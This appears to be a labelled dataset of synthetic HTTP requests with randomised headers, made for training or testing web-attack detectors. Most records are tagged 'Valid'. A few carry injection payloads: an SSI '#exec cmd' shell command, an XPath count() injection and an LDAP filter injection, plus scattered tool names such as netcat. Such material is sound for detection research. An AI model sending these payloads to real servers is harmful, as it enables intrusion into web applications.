If-Modified-Since: Tue, 20 Dec 05 12:28:14 GMT
If-Unmodified-Since: Mon, 22 Oct 07 06:51:13 CET
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: "_s-iuSsY7W2kBiHFwRn"
If-Range: Sat, 21 Jun 08 17:05:16 UTC
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXNlaDRyaHNiMlNpMDV3YnVodGx1SGkzb2dhc3RpZW5FdHJoYmRyb28=
Authorization: NTLM eWQ4aHRlZHNhN2lFaW11c2R0aTluY3Rla25qMXJUdG5haUYwbXM=
Range: 245681-56,307766-2495,67-9
Referer: /9iria2n.php
TE: deflate;q=0.3,deflate;q=0.9
Trailer: Authorization
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 0.6; eO-tt; rv:2.4.1) Gecko/36724698
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 0.6 www.wma0.css:559, 7.7 91.221.237.206
Transfer-Encoding: compress
Upgrade: r88e/3.1, eipneG/6.0, tm7/7.0, feaq/2.0, Fat8/9.6
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 07344757970707367
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8266
Start - Id: 4921
class: Valid
POST /oE5oc/ngpaDrMFn8pK.B/kpGSENv/nCQNevalG/sUrdekuec/oF4eopa4uykq4/memMoiirNryih/h3eao.css? HTTP/1.1
Content-Length: 62
Content-Language: m6aes,cnnpdro5
Content-Encoding: compress
Content-Location: /eiri/3tbo/ypslt.mdb
Content-MD5: ZWlyTXJyNHlvY2loUm1lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jan 10 22:41:40 CET
Last-Modified: Thu, 09 Jun 05 19:21:11 UTC
Host: 50.52.34.107:66568
Connection: close
Accept: audio/basic
Accept-Charset: x-mac-cyrillic;q=0.0, windows-874, hz-gb-2312
Accept-Encoding: 
Accept-Language: eu-xgreo;q=0.9, Dj-Acoht
Cache-Control: no-transform
Client-ip: 47.100.65.174
Cookie: R04r=93101570;mhonQr3eoeqbsk=1
Cookie2: $Version="0"
Date: Wed, 09 Nov 05 01:17:03 GMT
ETag: W/"k3ZBJlp3z6SDXMh"
Expect: pni9w
From: osuu@ioeO.org
If-Modified-Since: Mon, 31 Jul 06 02:32:43 UTC
If-Unmodified-Since: Thu, 22 Oct 09 14:44:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 079
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic ZW5lamU0YTprdHg1czU=
Range: 0401-,-401,485260-5
Referer: http://www.cp3t.fr/dvtvh/ttel/etlpo/qreogE.nsf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/2.5 (compatible; MSIE 7.7; Linux i586; ittesta)
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: 6.0 www.auico.gif:81402, 4.1 www.gr1eSes.shtml
Transfer-Encoding: compress
Upgrade: dnb/4.0
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 074898
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lsiapeqxe=hean<e'wGutr&rttexNaek=723013&o44EiHtdmmtlce=530

End - Id: 4921
Start - Id: 39924
class: SSI
POST /s7S/o1NQVCIYWL0aSY/suSefanrit8glNiaaT/qaeteEdtty2ta10is/idje/sptlnomsdtf/5rniemlrsnam/ic/oZZWH8Jl1NG.gif? HTTP/1.0
Content-Length: 315
Content-Language: ud1a5lr,exe,5edo
Content-Encoding: identity
Content-Location: http://t7Gqbc.ch/Qlft/idN9/81oe/ewiz/ohto8t4f.msf
Content-MD5: OGxuRTBleTJvbnJpZXJrYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Sep 07 14:08:27 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: www.uoirigc.de
Connection: ermy3m
Accept: application/rtf;q=0.6
Accept-Charset: iso-8859-5;q=0.2, euc-cn
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=628
Client-ip: 244.75.115.251
Cookie: al=4
Cookie2: $Version="25"
Date: Sun, 31 Jan 10 06:55:48 GMT
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: "gssuUYT8PYMHjt4Af_"
If-None-Match: *
If-Range: *
Max-Forwards: 154
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Digest username="eseT3sEl"
Referer: http://www.gnTTMin.net/xti9red/opseo.jpeg
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 2.5; hC-te; rv:1.0.9) Gecko/74592284
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: compress
Upgrade: ltdr/2.1, tnn/9.9
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hOafmgrdr=6344&br5gCy9at4eHHa=715345579&owhereavnetcatXCoc4X=<!--   #exec   cmd="/bin/ls    -l     /home/npavuwmd7e/lm"     -->&ctSfyueDiR= childt&uQZlS73lFa=ifeals&2osyf=d5ei0osM&9nd9xs7He=ewp3mcCt@L&connecte_Rx=oQ h3h hio7<ltt&9eNq=5Dwlanonnewposition&seexrr=dooCs5rvselib6snpassthru s

End - Id: 39924
Start - Id: 48734
class: XPathInjection
GET /cd7AE7JgZPFUIbin/cqJw1.P/dnE06ohei/n5u6iaem1ICoR5ten/vseksod8aaee5tT/r440cvN@A/to/s5z4xzMZWCYs/6XdyXtL/UfYXmMmm2E-7En.tiff?rhlEcOsrn7cmRn=le&ieoUt=sekQdr+%2Fpe&o2oqneopsu=256140&up=vndy+%25cav&g4deogt=txV&Q16jautoexec0MX9=rdesxp_-2cator&sqqt3cUrt9st=t.Rh2qoM1pl&c9lms=0Ps+h1&usrRzokpOD=%2B&vPbBOechoEIZfk=LDoit4wTO%7Cn+rr&nabcioSwts=%28i+++%3C++count%28ci%2Fchild%3A%3Atext%28%29%29++and++++j+++%3C+count%28ie5%2Fchild%3A%3Acomment%28%29%29++++and++k+++++%3C++count%28ljwrsn%2Fchild%3A%3A*%29++++%29 HTTP/1.1
Host: www.oedaf.de:2
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman
Accept-Encoding: compress;q=0.0, deflate
Accept-Language: Mje5n0h-ieceodat, tfsrz9-73;q=0.0, irar-aik5d0r;q=0.9, iiue-leA;q=0.0
Cache-Control: no-cache
Client-ip: 219.77.148.199
Cookie: fromndocumentUnwindow.openY4xGO=173832;teloz=a6c;psloat1sscb=utp=1idli2;giuequrctrs=ce?or
Cookie2: $Version="582"
Date: Mon, 07 Aug 06 03:45:06 GMT
ETag: "BNYgiCLjg9lbGVfj_6"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Tue, 10 Feb 04 04:03:52 UTC
If-Unmodified-Since: Mon, 07 Aug 06 02:12:24 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: Tue, 20 Mar 07 23:05:13 GMT
Max-Forwards: 945
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM Y3ByYXZ0cmV1d2VmeWZscjhmZWllNTZhZm9lZW9XcmdvYmVhZEh0d25zZWhndg==
Range: 328-,-79624
Referer: http://www.peglt.st/rsT5r/e9lel/rtlh/lAyfEldc/cose.php3
TE: deflate;q=0.8,deflate
Trailer: Upgrade
User-Agent: Mozilla/2.3 (compatible; Konqueror/7.7; Open BSD i586; 5hwhj)
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 1.7 222.64.33.192, 6.7 www.hpy7al4.jpg
Transfer-Encoding: deflate
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 251.236.113.138
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48734
Start - Id: 9380
class: Valid
GET /tEmtithiuM8eacat7u5.js?4pb5v2tmsGalEey=217&nowbeeoicedm=varnt+a-cadseb&ceOTa=k2f85aimgsuapel&nmnreeo38ehaarm=otti&wPshr=451&LscriptZRxjbpsN=tt%29&swu2taasec=60&s7.iEselect=arlwp-9l&lhmdNetae=acceptRetQ%3C%27%29at HTTP/1.1
Host: 68.104.246.102
Connection: keep-alive
Accept: video/*, text/xml
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: omLm-lhdqipgb;q=0.5, tp-ta;q=0.2, fNosn6n-inajo
Cache-Control: ici=roN1
Client-ip: 120.165.116.131
Cookie: eos9oqedtnna8=RySea0y9;gAGPk=ushvbscript;Pi36e.iCe=hoe/ledqthwst;EIDXj=/cohf;o8p1uee=zhe;YLBRAJS=dHEvea7rinhdss
Cookie2: $Version="499"
Date: Mon, 02 Jul 07 06:50:16 UTC
ETag: W/"bz7T637sVilnuIcqZ"
Expect: 100-continue
From: ofie@0ert.fr
If-Modified-Since: Fri, 20 Mar 09 12:21:03 UTC
If-Unmodified-Since: Fri, 14 Oct 05 14:43:46 UTC
If-Match: *
If-None-Match: "stPk6I32b0@M3OCPw"
If-Range: Sun, 13 May 07 12:55:54 UTC
Max-Forwards: 5
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: Basic ZGthd3BzZTo5aTh0cU4=
Range: 318-15
Referer: /cisthtsn.exe
TE: trailers,trailers,chunked
Trailer: Accept-Encoding
User-Agent: neiomssfn/2.4
UA-CPU: Sparc
UA-Disp: 147,1254,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9764x9599
Via: FTP/8.5 www.hi8h.png, 6.5 www.ntdesgt.jpeg
Transfer-Encoding: gzip
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 782 1.21.166.132 "ddoam8pa2ee" "Mon, 28 Jun 04 14:04:38 UTC"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 77473123
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9380
Start - Id: 2469
class: Valid
GET /3ic/9@0selectnull/pDkny8./Vlocation3Wiframe0/hhmVDNO/tIdPkdSFEZ31bAzQ0QS/ao1i27ltrekymuh01es/nAJ12/DasojunUsbueyeNan3o.dll? HTTP/1.1
Host: 136.24.15.243
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1258;q=0.2, cp-936;q=0.5, hz-gb-2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.197.207.157
Cookie: olahnwh=La;taqtra=nl yhlobjectGtCsystemtupdate d
Cookie2: $Version="0"
Date: Wed, 08 Feb 06 10:56:51 CET
ETag: W/"CuRD6g@yvVRM9TXyO"
Expect: dEtda
From: 0s8tX@arsT.cz
If-Modified-Since: Tue, 27 Apr 04 06:47:48 CET
If-Unmodified-Since: Mon, 01 Sep 08 14:21:40 UTC
If-Match: *
If-None-Match: *
If-Range: "WzVXYvcXp_5MUSt"
Max-Forwards: 7179
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM d2F4dE4zUWdjZWRoTTl0ZW9sZXR0TGN3YnRpd3NvYW8xYWVvZ2w4NHNo
Range: 87817-,2898-
Referer: /eewjsd/5ev9/grc4dnee/psdo.mdb
TE: gzip;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 9.6; zk-yr; rv:4.4.9) Gecko/81015001
UA-CPU: x86
UA-Disp: 105,9548,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 392x1193
Via: 7.8 119.145.224.200:87611, FTP/1.5 158.217.237.245
Transfer-Encoding: compress
Upgrade: Hslrot/3.2, nPdtaa/1.1
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2469
Start - Id: 10779
class: Valid
GET /EoLZ.u9ZTWUd/Ysotinh/ZIaEUH0a./7UhR/8window.open3QoBZsSEbx.shtml?eguai8ywrrciw=ifex4ouerlnorehH1&kXvWf9P99gc=9930000&nnLp=eg4gacopyA&aNeT=sil&oo0issnf3w=natltisqi&utebEnteoNd=m5iGusrTHA&oeiuteo=91868&ttLt3llleoehnn=haoek&if=7ilehevre2nahYis&cheka=94&areuggjke=nbnrnitmEwish&iWc9=1 HTTP/1.1
Host: www.klnen8ufno.org:077
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.6, utf-7;q=0.4
Accept-Encoding: compress;q=0.6, identity;q=0.1, identity, compress;q=0.7, compress;q=0.3
Accept-Language: E-dStxe4;q=0.3, a1e1wNte-shuq, n-cki;q=0.9, rme-Rdewesls;q=0.5
Cache-Control: only-if-cached
Client-ip: 228.70.131.109
Cookie: exsdraaoe=eOEcawindow.open;ltt=2;dlSzsao=821399;btns3eo=DornKsretau2nua
Cookie2: $Version="49"
Date: Thu, 15 Jun 06 09:22:19 GMT
ETag: "BXgx4iZevSqj21K"
Expect: RsOsT1t
From: Ionmrq@m5vte.org
If-Modified-Since: Tue, 01 Aug 06 17:26:44 UTC
If-Unmodified-Since: Mon, 09 Oct 06 03:04:15 CET
If-Match: "6cBfDMO.YDsSHrhrNlCe"
If-None-Match: "rj_mb755FF2PWxt"
If-Range: Wed, 26 Mar 08 05:47:33 GMT
Max-Forwards: 46
MIME-Version: 2.2
Pragma: bftf=6taesnnt
Proxy-Authorization: Basic ZG5lMWU6c2VlcGNvbGM=
Authorization: tfh1c si1o4wGk=iunRy2l7
Range: 49686-192
Referer: http://www.3ysacid.de/lt1ho/Idfssha/Yuka/2mnsjobk/1ITnupAa.cgi
TE: trailers,gzip
Trailer: Host
User-Agent: Mozilla/7.5 (X11; U; Open BSD i386 2.0; et-up; rv:1.0.0) Gecko/39416172
UA-CPU: StrongARM
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5959x647
Via: 0.8 255.118.157.182, ezttq/6.4 120.37.133.103
Transfer-Encoding: 3teu; tgzfeti=Ylrin
Upgrade: tup/2.0, iesn/6.5
Warning: 152 44.29.30.211 "fbevl4t0lFoat8oi" 
X-Forwarded-For: 64.18.140.176
X-Serial-Number: 20081399202583865
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10779
Start - Id: 16003
class: Valid
GET /iuthaebr9/aafn.css?aeXesmh=upa&SdXXGboot.ini9t=0fromemjlyeth0t8i&aetshyC18aelps9=nhsiT&iddhei=5156856728&leaiestot9lTitc=imgyfotgn1T&h6rDsefeIandi3=h7ehwxterm HTTP/1.0
Host: 248.126.223.129
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, windows-1254, iso-8859-8;q=0.3, windows-874;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 95.5.104.71
Cookie: IFR4netcatOj=794;sl0=tstuifh5h6;bE5shrnT2ao=of7niass8yotyetesI
Cookie2: $Version="9"
Date: Wed, 25 Feb 09 09:43:31 CET
ETag: "foHX3bXLfs1bsOyu"
Expect: 100-continue
From: lnaihJy@tevauie.cz
If-Modified-Since: Sat, 16 May 09 20:47:39 CET
If-Unmodified-Since: Sun, 02 Mar 08 09:27:37 UTC
If-Match: *
If-None-Match: "CYkTT@OILgOBRXZ5c"
If-Range: "V1H4QPRHKPlEchvApRE"
Max-Forwards: 418
MIME-Version: 9.8
Pragma: marwiz=qienle
Proxy-Authorization: opvtak edesT=1eHenu
Authorization: Digest qop=auth
Range: 4-136390,-06191
Referer: /atbet/eeHrapad/rdto6/cvrh.jsp
TE: deflate;q=0.9,chunked;q=0.0
Trailer: Trailer
User-Agent: 3yti8e/8.4.5.0
UA-CPU: PowerPC
UA-Disp: 259,712,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: FTP/3.9 46.233.121.100, 8.0 84.120.65.28, 9.0 www.eo2w.tiff:74044
Transfer-Encoding: compress
Upgrade: fsn/0.0, tqdhe/7.9, jatac/9.9
Warning: 809 106.201.176.121 "t6rgoAtastVnesEit" 
X-Forwarded-For: 131.126.252.251
X-Serial-Number: 606819653
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16003
Start - Id: 15751
class: Valid
GET /o0O/19o09ml3fualwtidr/ajaDoyxlhotesj/mariai.jsp?eeUlea2=841&pu_2DQinsertXC=wediouhk6iterae&Anafgae=ie6q&jklocationgroup by=rnorivO&eM3q=raa3rLa HTTP/1.1
Host: www.y7lO4oja.cz
Connection: close
Accept: audio/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: Elnd='qsds'
Client-ip: 68.15.253.89
Cookie: ob=315888;Di6hFog8etLepa=mslikeoei;v;aaalVzSekeho=02614364
Cookie2: $Version="5"
Date: Wed, 09 Jan 08 14:54:02 CET
ETag: "x-r5ZAk2zerzig-y"
Expect: ieeghev=mfegd
From: Ptcoirt@emaueRf8s.fr
If-Modified-Since: Thu, 13 May 04 08:44:15 GMT
If-Unmodified-Since: Thu, 20 Aug 09 24:10:46 CET
If-Match: "ocfpziy6HWCt2iUJ7EP"
If-None-Match: *
If-Range: *
Max-Forwards: 9342
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: Basic bWhkZWI4bzphc2Fyd2V0QQ==
Range: -8290,128062-441231,3-
Referer: /bzfo0o/uPan/1ceH9ahM.tar.gz
TE: gzip;q=0.4,trailers,chunked
Trailer: Host
User-Agent: 709xZKvo http://www.DfpyietS.cz
UA-CPU: MIPS
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 516x1974
Via: 0.6 231.95.56.0, FTP/0.8 www.srxo.css:3, 3.9 www.tuOtRn.tiff
Transfer-Encoding: gzip
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 187 39.158.215.98 "I6Fton" "Mon, 11 Aug 08 06:05:52 GMT"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15751
Start - Id: 3355
class: Valid
GET /spn/lJH32i3QoS/bno1uAatasOcsrnInie/roSde/y-qh./G7.htm?mEbu0j=nenndr2sptat&pamb2ofuu=3 HTTP/1.1
Host: 155.215.63.127
Connection: close
Accept: audio/*;q=0.6, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: arpp-cvesNmot;q=0.6, AOyd-ek, teehCohn-tpm
Cache-Control: no-transform
Client-ip: 91.183.159.230
Cookie: %uYOYCXG2=fteTisf1h;sdee=Fnvf;eintestCs=2909;ett2fg=9333;ctTIooOzteslR4=4
Cookie2: $Version="8"
Date: Wed, 15 Feb 06 07:01:11 CET
ETag: W/"KxURYhTtFDJH7KbtM3fZ"
Expect: 100-continue
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Sun, 18 Dec 05 06:03:24 CET
If-Unmodified-Since: Sun, 02 Jul 06 14:06:28 CET
If-Match: "1vnFa.QZSx7eoWaft"
If-None-Match: "z.u0X@d6qaPqW8b1W"
If-Range: "NaF-FJSALh4Uz4wuN40s"
Max-Forwards: 6
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: r2ymao sdha=rh3ozee
Authorization: Basic a0VzZTY6c2lnMHRodHQ=
Range: -8,28-271041
Referer: /laos/hbea/ntEm.bin
TE: trailers,trailers
Trailer: Referer
User-Agent: hmcl9 (f7OW5DBmj@; zh_Ez0wE; sOSJn..xbv; liFAbtyz; cfneOZg@yx)
UA-CPU: x86
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8795x2718
Via: 6.6 www.sUas6kz.js, 0.2 www.1AaihsiA.css
Transfer-Encoding: compress
Upgrade: yeec2/5.6, ruid/6.9, hk5h/6.6, gr6/5.3, hwts3p/7.9
Warning: 318 www.thxeOtH.gif "5umistbtjodse20isns" 
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 3355
Start - Id: 39016
class: LdapInjection
POST /bqimIqaOtxshbhctbtip/Iaccess_logi3UjOi6RIhtaccesF/n9l2Ehtsirhcfxs8z.shtml? HTTP/1.0
Content-Length: 72
Content-Language: vdrq6nit,UtosAtri
Content-Encoding: gzip
Content-Location: http://www.1cle9.be/dshn/lamgv/h3usA/dsl3/Rcri.conf
Content-MD5: dVplaXM4c25uc2F0d3I2Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 May 06 20:24:40 GMT
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: 115.90.172.248
Connection: Ohpjwm4c
Accept: */*;q=0.4
Accept-Charset: gb2312;q=0.2, iso-8859-1, x-mac-arabic;q=0.3, windows-1254, windows-1253;q=0.2
Accept-Encoding: )   (   |   (   cn=*o'brien*   )(mail =*o    'brien*   )  
Accept-Language: v4e7n-me
Cache-Control: no-store
Client-ip: 103.25.9.144
Cookie: ds1ube7itTcd=eH3hEr5e0wlovu;hhiwsleoftghea=eNb95lx;AD3=44;767Ioru=9787997;6y=44632713
Cookie2: $Version="997"
Date: Thu, 14 Apr 05 17:20:29 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 19 Jun 06 16:47:38 CET
If-Unmodified-Since: Sun, 05 Aug 07 02:35:06 UTC
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: *
If-Range: Fri, 16 Sep 05 10:46:55 UTC
Max-Forwards: 19
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="raSsi"
Authorization: NTLM dWh1aXJocWVpYXllcnJoczhwb2VFc25kZHNUNGxpbG1lZXNs
Range: -085
Referer: /eosnusch/itBhsb/nluaesh/wamtt/ieTe.php
TE: chunked,chunked
Trailer: User-Agent
User-Agent: iCPDue http://www.d1to.biz
UA-CPU: 68000
UA-Disp: 744,650,16
UA-Color: color16
UA-Pixels: 960x5747
Via: HTTP/5.0 7.158.58.54:16105
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 562 166.100.218.31 "elnelas" "Mon, 19 Dec 05 03:33:45 UTC"
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

9n=54224978&cOC05v=mst&Pn3G=07958320&rC=e&rdSmOne=;ihrnaselect:ist-u

End - Id: 39016
Start - Id: 5000
class: Valid
POST /0Z/e2Z@cbj1BA/clox.1mUYlUN24/nkCdCtjeh4XYw7x2eHe/mD/laFcu/lEYnSD/ch4m/BiILperlFiF/EPTXNVPJvbscriptEGY.xml/firuuiewe/hVtdt.tiff? HTTP/1.1
Content-Length: 279
Content-Language: jden,e,teHhg
Content-Encoding: compress
Content-Location: http://nJua.fr/Hrez/3toahce/yaai/ton8hs9f/vlSi5tt.asp
Content-MD5: ZTB3OHRockVCRXQ3bmVvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Feb 04 07:05:58 CET
Last-Modified: Sat, 18 Apr 09 03:44:35 CET
Host: www.boiktw2ur.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-2, windows-1251;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 111.197.53.14
Cookie: eke8o=t;gokplopskiseCsj=9tn-etcn5 ;ln=647
Cookie2: $Version="38"
Date: Sun, 18 Feb 07 24:48:39 CET
ETag: "IHXPz-1lLhpfjPWyc"
Expect: 100-continue
From: her7cr@helyhe.it
If-Modified-Since: Thu, 28 Jun 07 19:09:19 UTC
If-Unmodified-Since: Thu, 19 Apr 07 15:43:37 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Jan 08 23:35:00 UTC
Max-Forwards: 80
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 81ua twrn=orke
Range: -10
Referer: /ithlce/HeEaz/oppoq/ftgu0hii.exe
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.6 (Windows; U; WinNT 0.8; an-te; rv:6.9.1) Gecko/23878544
UA-CPU: 68000
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: FTP/6.3 www.Tmronf.tiff
Transfer-Encoding: identity
Upgrade: hMr/2.1, sbroy7/3.5, sa4aS8/1.4, Tm12uo/1.4, R6cee/4.7
Warning: 599 www.erzlDl.htm "keenmTtpwuriveed" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

emlauhishevk=ia&er6edxaw=iieval&inllli9dionya=sbt&emp=ul&bvLi5xnneu=t~ ps sdeleteR&lern25mmeE=5182663513&8Obpxoei=oonr2tsock_streamhnozae-f&OeNteHuurnyhiI=fRiad&graum=ac&6ed=icottshwcodh&yiebnhmcee=7&ngekatt5z=blrsytuaue&khyohEnRa=aJY0gflen_D&Sftotme4rs=eZyRO&Ljaa=tNQPTU1BtjTq

End - Id: 5000
Start - Id: 3999
class: Valid
PUT /9msdjyz2hlrtE/_p26i-2KW7NH9/oFWV/lareA68/ne0RAAJTqtCDy2/etdshhtdj9tDe/b_62.L2NK@adminv/tH.Q2E0.html? HTTP/1.1
Content-Length: 59
Content-Language: deess
Content-Encoding: gzip
Content-Location: http://www.thve.com/bevs84t4.aspx
Content-MD5: bnVuNmllc3dhckV0ZTBBdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Mar 06 04:50:04 GMT
Last-Modified: Wed, 24 Sep 08 22:18:13 CET
Host: 173.152.161.74
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.1, iso-8859-8-i, iso-8859-7, macintosh;q=0.1, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: te9-aaznpmwO;q=0.3
Cache-Control: only-if-cached
Client-ip: 56.123.198.80
Cookie: uitl=uit stlidEAntl;rZhAnaijLcboa=s;t5fmdWv=06329130
Cookie2: $Version="822"
Date: Wed, 14 Mar 07 18:40:18 GMT
ETag: "eiWn0tPL6IJ-5YX"
Expect: 100-continue
From: shrd67t@nesPar.biz
If-Modified-Since: Mon, 08 Mar 04 13:57:42 UTC
If-Unmodified-Since: Tue, 17 Apr 07 20:13:03 CET
If-Match: "HV_3B63f@Ogh3Rmivp"
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Digest response="7abC1bF906d7Cd663A940E2FDC6F2f0F"
Range: -9547,5300-11,-55
Referer: http://www.ko0es.org/mualak/i6cEgi/7hmlOd/x1t2no2l/r2waohh.zip
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (compatible; Konqueror/9.5; Windows NT; tSsEv6jaf; dP5avtspD3; 1err)
UA-CPU: Sparc
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 5.7 www.elTu7c.shtml
Transfer-Encoding: deflate
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 442 www.azjbyn.gif "uhemezissofcc" "Sun, 09 Sep 07 08:19:07 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 4557721
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

ZMh8hwinntPpKI=t3e&eT=4&dsgtrebpy=053049&pythoionwo7p=30129

End - Id: 3999
Start - Id: 23070
class: Valid
GET /1ncoitwWf/scriptXnzGf2eUn.jpg?eansoZe3oEish3e=93&lwu0rsq=Tu&sT=pOIPBgp%40W&Aac4tdneoet=iuhtacces&tiymtod=fNPHH&nuuQ2n8edoljcR=822&3lEN65SsEwsn=o&uley7nkdTlB=l HTTP/1.1
